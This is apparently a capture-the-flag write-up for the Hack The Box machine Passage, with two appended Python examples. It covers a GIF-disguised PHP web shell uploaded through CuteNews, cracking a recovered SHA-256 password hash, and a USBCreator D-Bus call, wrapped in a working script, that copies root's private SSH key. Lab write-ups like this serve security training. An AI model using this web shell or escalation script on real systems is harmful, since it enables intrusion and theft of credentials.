Passage [HTB] Write-up + custom python-exploit w/o msfconsole

Target

  • Name: Passage [Hack the box]
  • IP: 10.10.10.206
  • OS: Linux
  • Difficulty: medium

Used tools:

  • Kali Linux 2020.3 (VMware Workstation)
  • Nmap
  • Firefox
  • Netcat
  • Python script / PHP
  • gdbus for privilege escalation

Part One: Enumeration

First of all, make sure you are connected to the Hack The Box VPN; then we are ready to start nmap:

sudo nmap -T4 -sS -A -Pn 10.10.10.206

Cool, there is a web server running on this machine on port 80. Fire up Firefox and browse to http://10.10.10.206/
We land on the home page, and the first news item says Fail2Ban has been implemented: after too many requests to this website our IP gets banned. I ran Gobuster and got banned for 2 minutes, lol, it doesn't lie. Keep any directory brute-forcing throttled on this box or the ban will keep interrupting you.

After some research on the website I found out that it is powered by CuteNews CMS, so I searched for the login panel.

I did some research on Google about this CMS and found several vulnerabilities. For example, we can register, get logged in automatically, and change our profile picture.

Then you can upload a PHP script disguised as an image/gif file and execute commands on the web server, so I decided to write a Python script to automate this process.

Python Script

This Python script registers and logs in to CuteNews, replaces the profile image with a PHP script masked as a GIF file, and then gets you inside the machine. Simple, right? I took some inspiration from CVE-2019-11447 and now I will explain how it works.
You can find my personal code on Github: https://github.com/Andrxid/Passage_HTB_exploit

Register Function

This is the most important part of the script. To write this function you need the “data” the website expects: the values required for user registration. You can find them by capturing the requests with a proxy such as Burp. In this case the function generates a random password, user, and email.

Log In function

The process is much the same as for the registration part.

Function Payload

This function takes the PHP script I made, submits the profile settings with the fake profile photo, and gets the image link for the user, which now points at the payload.

The PHP script is very simple: it takes the command from the request parameter, and I prepended “GIF8;” so that the upload is accepted as an image.

GIF8;
<?php system($_REQUEST['cmd']) ?>

Moreover, I created two threads with two functions: the bash function, which simply starts a netcat listener, and the request function, which sends a GET request to the image link (the PHP file) so that it connects back to my netcat listener.

There are also an init function and a run function; you can find them at the GitHub link.

Part Two: Exploitation

After creating our script we can run it and get inside the machine quickly.

Run the Python script and enter the target URL:

python3.9 exploit.py

The script asks whether we already have an account; in this case we select no.

It generates a random one, logs in to the website automatically, and uploads our custom PHP script.

To get the connection back, give the script the IP of your listener so it can set the listener up, and there you go!

TTY shell

To upgrade to a TTY shell run this command:

python3 -c 'import pty;pty.spawn("/bin/bash")'

After some looking around I went to the data folder “cdata”, which contains: news, users, plugins, btree, backup, log.

In the users folder there are many files, so let's cat them all:

cat * 

They are base64 encoded; after decoding a lot of them I found something interesting in this one.

Use this command to decode it in your terminal:

echo "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2IjtzOjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIiO3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJlMjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2NkIjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19" | base64 -d

The output is a PHP-serialized record for Paul Coles, and paul is also a user on the machine. The pass field holds a password hash (not an encrypted password); I used CyberChef to detect the hash type.

It's a 64-character hex digest, a plain, unsalted SHA-256 (hashcat mode 1400). Let's crack it!

hashcat -m 1400 -a 0 hash rockyou.txt

Note that the wordlist is a positional argument: hashcat's -w flag sets the workload profile and does not take a wordlist.

Paul's credentials are paul:atlanta1.
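The same three steps (base64-decode the users file, parse the PHP serialize() record, classify the pass field and test candidates) carried out in one script, as an added example that is not part of the original write-up. The record is the one printed above; the parser handles the a/s/i/b/N types found in that record; the word list is constructed for the demo, with atlanta1 included because the write-up reports hashcat recovered it.

```python
#!/usr/bin/env python3
"""Added example (not from the write-up): decode a CuteNews cdata/users record,
parse the PHP serialize() array, classify the pass field and test candidates
with hashlib. The record is the one on the page; the word list is constructed."""
import base64
import hashlib
import re

# The base64 body of the users file shown above (cdata/users/*.php).
PAUL_RECORD_B64 = (
    "YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1jb2xlcyI7YTo5OntzOjI6ImlkIjtzOjEwOiIxNTkyNDgzMjM2Ijtz"
    "OjQ6Im5hbWUiO3M6MTA6InBhdWwtY29sZXMiO3M6MzoiYWNsIjtzOjE6IjIiO3M6NToiZW1haWwiO3M6MTY6InBhdWxAcGFzc2FnZS5odGIi"
    "O3M6NDoibmljayI7czoxMDoiUGF1bCBDb2xlcyI7czo0OiJwYXNzIjtzOjY0OiJl"
    "MjZmM2U4NmQxZjgxMDgxMjA3MjNlYmU2OTBlNWQzZDYxNjI4ZjQxMzAwNzZlYzZjYjQzZjE2ZjQ5NzI3M2Nk"
    "IjtzOjM6Imx0cyI7czoxMDoiMTU5MjQ4NTU1NiI7czozOiJiYW4iO3M6MToiMCI7czozOiJjbnQiO3M6MToiMiI7fX19"
)

def php_unserialize(data):
    """Minimal parser for PHP serialize() output: a (array), s, i, b and N.
    String lengths are byte counts, so callers pass latin-1 decoded text."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos]
        if t == "N":                      # N;
            pos += 2
            return None
        if t in "ib":                     # i:123;  b:1;
            end = data.index(";", pos)
            val = int(data[pos + 2:end])
            pos = end + 1
            return bool(val) if t == "b" else val
        if t == "s":                      # s:4:"name";
            colon = data.index(":", pos + 2)
            n = int(data[pos + 2:colon])
            val = data[colon + 2:colon + 2 + n]
            pos = colon + 2 + n + 2       # skip closing quote and ';'
            return val
        if t == "a":                      # a:2:{key;value;key;value;}
            colon = data.index(":", pos + 2)
            n = int(data[pos + 2:colon])
            pos = colon + 2               # skip ':{'
            out = {}
            for _ in range(n):
                key = parse()
                out[key] = parse()
            pos += 1                      # skip '}'
            return out
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    return parse()

def decode_record(b64):
    return php_unserialize(base64.b64decode(b64).decode("latin-1"))

def user_entries(record):
    """CuteNews nests users as {'name': {username: {id, name, acl, email, pass, ...}}}."""
    return list(record["name"].values())

HEX_DIGESTS = {32: "MD5-sized", 40: "SHA-1-sized",
               64: "SHA-256 (hashcat -m 1400)", 128: "SHA-512-sized"}

def classify(h):
    """Length-based guess for a bare hex digest; not proof, hashcat must confirm."""
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return HEX_DIGESTS.get(len(h), "hex digest of unusual length")
    return "not a bare hex digest"

def sha256_hex(word):
    return hashlib.sha256(word.encode()).hexdigest()

def crack_sha256(target, wordlist):
    """What mode 1400 computes per candidate: unsalted SHA-256 of the word."""
    target = target.lower()
    return next((w for w in wordlist if sha256_hex(w) == target), None)

if __name__ == "__main__":
    for u in user_entries(decode_record(PAUL_RECORD_B64)):
        print(u["name"], u["email"], u["pass"], "->", classify(u["pass"]))
        # Constructed word list; the write-up reports hashcat recovered atlanta1.
        print("cracked:", crack_sha256(u["pass"], ["password", "Passage2020", "atlanta1"]))
```

Running it prints each user's name, email, hash and classification, then the cracked word. If a users file starts with a PHP guard line before the base64, drop that line first. For real wordlists hand the hash to hashcat as above; the hashlib loop is only there to show what mode 1400 computes for each candidate.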

Type:

su paul

Now we are paul and can read user.txt:

cat user.txt

This part is pretty easy: the id_rsa key available as paul also logs in as nadav over SSH, so from paul's shell run:

ssh nadav@10.10.10.206

Now we are nadav!

Part Three: Privilege escalation-root

Run:

ps aux

ps aux lists every running process, and some of them run as root, for example:

root       2388  0.0  0.4 235548 20020 ?        Sl   00:25   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

The vulnerability is discussed in detail in this post:

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

Run this command from the /tmp folder (cd /tmp):

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/key true

The Image method of the USBCreator service runs inside the root-owned helper and copies the source file to the destination without checking who asked, so /tmp/key is now a copy of root's private SSH key (the command does not generate a new key).

Check that the file starts with a PRIVATE KEY header, copy it to your machine, set its permissions to 0600, and use it as the identity file to SSH in as root.
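The escalation step wrapped with the checks you want around it, as an added example that is not from the original post: confirm the root-owned helper is present, issue the same gdbus call (Image(source, target, allow_unmount) on com.ubuntu.USBCreator), verify the destination really is a private key, and set it to 0600 so ssh -i accepts it. The source and destination paths and the helper name are the page's; gdbus is only invoked when installed, so the key-header check can be exercised without a system bus.

```python
#!/usr/bin/env python3
"""Added example (not from the write-up): the USBCreator D-Bus copy with the
checks around it. Paths and the helper name are the page's; gdbus is only
invoked when present, so the key check can be exercised without D-Bus."""
import glob
import os
import shutil
import subprocess

HELPER = "/usr/share/usb-creator/usb-creator-helper"   # the root process from ps aux

def helper_pids():
    """PIDs whose /proc cmdline names the helper (what ps aux | grep usb-creator shows)."""
    pids = []
    for path in glob.glob("/proc/[0-9]*/cmdline"):
        try:
            with open(path, "rb") as f:
                if HELPER.encode() in f.read():
                    pids.append(int(path.split("/")[2]))
        except OSError:      # process exited between glob and open
            continue
    return pids

def gdbus_argv(src, dst):
    """The write-up's call as an argv list: Image(source, target, allow_unmount)."""
    return ["gdbus", "call", "--system", "--dest", "com.ubuntu.USBCreator",
            "--object-path", "/com/ubuntu/USBCreator",
            "--method", "com.ubuntu.USBCreator.Image", src, dst, "true"]

def is_private_key(data):
    """True when the first line is a PEM/OpenSSH private-key header."""
    first = data.lstrip().split(b"\n", 1)[0].rstrip(b"\r")
    return first.startswith(b"-----BEGIN ") and first.endswith(b"PRIVATE KEY-----")

def copy_as_root(src="/root/.ssh/id_rsa", dst="/tmp/key"):
    """Ask the root-owned helper to copy src to dst, then verify and lock down dst."""
    if shutil.which("gdbus") is None:
        raise RuntimeError("gdbus not installed; cannot talk to the system bus")
    if not helper_pids():
        print("note: usb-creator-helper is not running; the bus may still activate it")
    subprocess.run(gdbus_argv(src, dst), check=True)
    with open(dst, "rb") as f:
        data = f.read()
    if not is_private_key(data):
        raise RuntimeError(f"{dst} does not look like a private key: {data[:40]!r}")
    os.chmod(dst, 0o600)     # ssh refuses an identity file readable by others
    return dst

if __name__ == "__main__":
    key = copy_as_root()
    print(f"root key at {key}; now: ssh -i {key} root@localhost")
```

The same Image call copies any root-readable file, so the key check is what tells you the method did what you expected rather than, say, returning a zero-length file; chmod 600 saves the usual "unprotected private key file" refusal from ssh.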

Easy man, you obtained the root flag!

If you have any questions or suggestions do not hesitate to contact me

Thanks for reading this and good hacking!
